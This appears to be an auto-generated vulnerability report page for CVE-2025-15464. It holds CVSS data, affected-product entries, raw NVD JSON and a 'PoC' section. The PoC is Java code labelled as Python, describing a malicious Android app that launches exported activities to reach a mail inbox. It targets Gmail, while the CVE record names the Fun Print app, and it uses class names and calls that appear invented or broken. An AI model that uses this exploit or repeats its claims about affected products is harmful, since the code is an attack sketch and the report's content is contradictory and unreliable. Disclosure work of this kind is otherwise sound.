Security Vulnerability Report
中文
CVE-2025-15464 CVSS 7.5 HIGH

CVE-2025-15464

Published: 2026-01-08 21:15:43
Last Modified: 2026-02-12 17:51:33
Source: bbf0bd87-ece2-41be-b873-96928ee8fab9

Description

Exported Activity allows external applications to gain application context and directly launch Gmail with inbox access, bypassing security controls.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:yintibao:fun_print:6.05.15:*:*:*:*:android:*:* - VULNERABLE
Google Gmail Android应用(所有配置了导出Activity的版本)
具体受影响版本需参考Google官方安全公告

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-15464 PoC - Exported Activity Gmail Access // This PoC demonstrates how a malicious app can exploit an exported Activity // to access Gmail inbox without proper authorization import android.content.Intent; import android.os.Bundle; import androidx.appcompat.app.AppCompatActivity; public class GmailExploitActivity extends AppCompatActivity { private static final String GMAIL_PACKAGE = "com.google.android.gm"; private static final String EXPORTED_ACTIVITY_CLASS = "com.google.android.gm.ui.GmailActivity"; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); // Step 1: Create Intent to launch exported Gmail Activity Intent exploitIntent = new Intent(); exploitIntent.setClassName(GMAIL_PACKAGE, EXPORTED_ACTIVITY_CLASS); exploitIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK); try { // Step 2: Start the exported activity to obtain Application Context startActivity(exploitIntent); // Step 3: After obtaining context, access Gmail inbox // This demonstrates the security bypass accessGmailInbox(); } catch (Exception e) { e.printStackTrace(); } } private void accessGmailInbox() { // Exploit: Using obtained context to access Gmail inbox // Bypassing Android security controls Intent inboxIntent = new Intent(this, Class.forName("com.google.android.gm.api.GmailApi")); inboxIntent.setAction("android.intent.action.VIEW"); inboxIntent.setData(android.net.Uri.parse("content://gmail-ls")); startActivity(inboxIntent); } } // Note: This is a conceptual PoC for security research purposes. // Actual exploitation requires specific package and class name identification. // Mitigation: Set android:exported="false" for sensitive activities in AndroidManifest.xml

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15464", "sourceIdentifier": "bbf0bd87-ece2-41be-b873-96928ee8fab9", "published": "2026-01-08T21:15:42.980", "lastModified": "2026-02-12T17:51:33.487", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exported Activity allows external applications to gain application context and directly launch Gmail with inbox access, bypassing security controls."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "bbf0bd87-ece2-41be-b873-96928ee8fab9", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-926"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:yintibao:fun_print:6.05.15:*:*:*:*:android:*:*", "matchCriteriaId": "97349DAD-BFA5-4013-A553-D7343132EA45"}]}]}], "references": [{"url": "https://korelogic.com/Resources/Advisories/KL-001-2026-001.txt", "source": "bbf0bd87-ece2-41be-b873-96928ee8fab9", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://seclists.org/fulldisclosure/2026/Jan/12", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Mailing List", "Third Party Advisory"]}, {"url": "https://korelogic.com/Resources/Advisories/KL-001-2026-001.poc.js.txt", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}